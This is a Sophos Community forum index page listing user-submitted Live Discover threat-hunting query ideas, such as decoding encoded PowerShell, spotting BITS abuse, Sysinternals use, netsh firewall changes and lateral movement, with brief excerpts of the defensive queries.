Sophos Community
Site
User
Site
Search
User
Community & Product Forums
Sophos Endpoint
Sophos Firewall
Sophos Central
Sophos Factory
Sophos Mobile
Sophos Cloud Optix
Sophos Sensor
Sophos Switch
Sophos Wireless
Sophos Email
UTM Firewall
Community Blogs & Events
Sophos Community Blog
Community Security Blog
Product Documentation Blog
Application Control
Getting Started
Sophos Partners
Sophos Partners Group
Member Recognition
Community Leaderboards
More
Cancel
Sophos Endpoint
Processes
Release Notes & News
Discussions
Recommended Reads
Threat Hunting Academy
Early Access Programs
Live Discover & Response Query Forum
More
Cancel
New
Sophos Endpoint requires membership for participation - click to join
Overview
Live Discover allows you to check the devices that Sophos Central is managing, look for signs of a threat, or assess compliance.
New to Live Discover & Response queries? See
Getting Started In Live Discover - From Beginner to Advanced Query Creation
Make sure to also check out
Best Practices On Using Live Discover & Response Query Forum
and
Sophos EDR Threat Hunting Framework
.
Note:
For more information on Live Discover, please check out our
Product Documentation
.
Navigate to a category below to browse and submit a query
Browse Live Response and Discover Queries by Category
Uncategorized
Anomalies
ATT&CK
Compliance
Device
Email
Events
Files
Live Response
Network
Other queries
Processes
Query Tips
Registry
Threat Hunting
User
Data Lake
Browse Ideas in Category
By highest score
By date
By recent status change
Descending
Ascending
All ideas
Ideas you submitted
Ideas you voted on
With any status
With any open status
With any closed status
With held votes
Currently 'Completed (Brand-new content)'
Currently 'Completed (Content Update)'
Currently 'Completed (Minor Issue)'
Currently 'Approved'
Currently 'Under Review'
Currently 'Coming Soon'
Currently 'Not Planned'
Currently 'Complete'
Decode encoded powershell
Karl_Ackerman
Approved on
9 Nov 2020
2 Comments
With the common use of powershell by cobalt strike and every other threat actor, I though it would be nice to have a query that detects and decodes encoded powershell commands. The first query will simply decode base 64 encoded data (As you would see...
9 Nov 2020 11:39 PM
Process HTTP Calls
JeramyKopacko
Approved on
27 Apr 2022
1 Comment
In testing out Caldera recently, the sandcat tool brings up a good point of interest in identifying where GET calls are being made. SELECT sophos_http_journal.PID, sophos_http_journal.PID, datetime(sophos_http_journal.time,'unixepoch','localtime') AS...
25 Nov 2020 7:46 PM
Query - Are any Sophos services not running?
Karl_Ackerman
Approved on
27 Apr 2022
3 Comments
REVIEWED by Sophos Sometimes adversaries are able to stop Sophos services, or the endpoint has had an install or update issue. As long as the live discover services are up an running you can find devices that do not have all the needed Sophos services...
12 Aug 2020 3:36 PM
Live Discover Query - Checking for redirected web traffic to unknown processes
jak
Approved on
10 May 2022
1 Comment
REVIEWED by Sophos While looking at the "sophos_ip_journal table", I noticed the interesting field "redirectionState" which could be useful to find traffic that is being covertly redirected to a local proxy before being sent on its way unbeknown to...
1 May 2020 6:25 PM
Live Discover Query - Living off the land BITS
jak
Approved on
9 May 2022
1 Comment
REVIEWED by Sophos There are many libraries one can use for making web calls, be it PowerShell, WinHTTP, XML but one of the more stealthy technologies is Background Intelligent Transfer Service (BITS). Information is available here as a starting point...
30 May 2020 8:43 PM
Threat Hunting - Powershell Script Blocks
AndyM
Approved on
27 Apr 2022
0 Comments
With the Sophos process journals you can see loads of information about the execution of processes as well as their command lines, but you cannot see the session data used directly in powershell, since it is running within the same process. Thankfully...
1 Mar 2021 4:07 PM
Generic Process Search on Windows
Karl_Ackerman
Approved on
9 May 2022
0 Comments
Hi folks, Sophos already published a canned query for 'Search for processes (Windows)', and while that one is really useful I had some asks for a different approach that allowed for larger time windows in the search and some different parameters. ...
15 Mar 2021 6:35 PM
Live Discover Query - Sysinternals
jak
Approved on
10 May 2022
1 Comment
REVIEWED by Sophos We all know how useful the tools from Sysinternals are. Thanks Mark! Clearly they are so useful that the crooks use them too, in particular, PsExex is a favorite. When these tools are run you have to accept a Eula, this state is...
20 Apr 2020 4:14 PM
Live Discover - PowerShell command audit
jak
Approved on
12 May 2022
0 Comments
REVIEWED by Sophos Hello Threat Hunters! I mentioned in this post: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/120201/live-response---command-audit/ how you could audit the history of PowerShell...
27 Jun 2020 1:56 PM
Live Discovery Query - SophosPID process activity digest
Karl_Ackerman
Approved on
4 May 2022
0 Comments
REVIEWED by Sophos We have added a new table to the sophos forensics journals. The sophos_process_activity table. Often as part of an investigation you need to to get a quick view of what a process did in the past and this table provides a quick lookup...
26 May 2020 3:15 PM
Live Discover Query: ALL system activity for N seconds from a date/time
Karl_Ackerman
Approved on
9 May 2022
2 Comments
REVIEWED by Sophos This query will show ALL system activity that was recorded from a time period. Given the volume of data that can be returned we recommend only pulling a few seconds of information at a time and then using that to narrow down on...
26 May 2020 5:38 PM
Process that writes on Shadow Copy space
GiovanniGiovannelli
Approved on
10 May 2022
2 Comments
Any idea for creating a query in order to extract a list of processes that write on Shadow copy space during a specified interval of time? Thank you
11 Dec 2020 5:17 PM
LIve Discovery Query: Process tree for a SophosPID
Karl_Ackerman
Approved on
12 May 2022
2 Comments
REVIEWED by Sophos One of the first things I like to understand when looking at a suspect process is how did it get started and what children processes if any did it create. To do that we need to build a process tree from the sophos process journal...
20 May 2020 11:41 AM
Live Discover - Lateral movement detection
Karl_Ackerman
Approved on
6 May 2021
2 Comments
REVIEWED by Sophos With Live discover I wanted to explore if I can write a query to detect lateral movement between devices that are under management. Because Live Discover queries are run on individual devices we can not easily build a query that directly...
3 Jun 2020 12:22 PM
Live Discovery Query - Netsh - is something or someone allowing access?
jak
Approved on
11 May 2022
1 Comment
REVIEWED by Sophos I can imagine the scenario where malware has executed and maybe looks to set up a communication channel. In order to allow itself through the Windows firewall, it may well add an incoming rule using the command line tool netsh. It...
23 May 2020 2:07 PM
Live Discover Query - identify devices where services could be an issue
jak
Under Review on
18 Apr 2020
1 Comment
REVIEWED by Sophos One possibility is to simply query the "services" table for service status, for example: select s.display_name, s.status from services as s where (s.display_name like 'Sophos%' or s.display_name like 'HitmanPro%') and s.status ...
18 Apr 2020 11:14 AM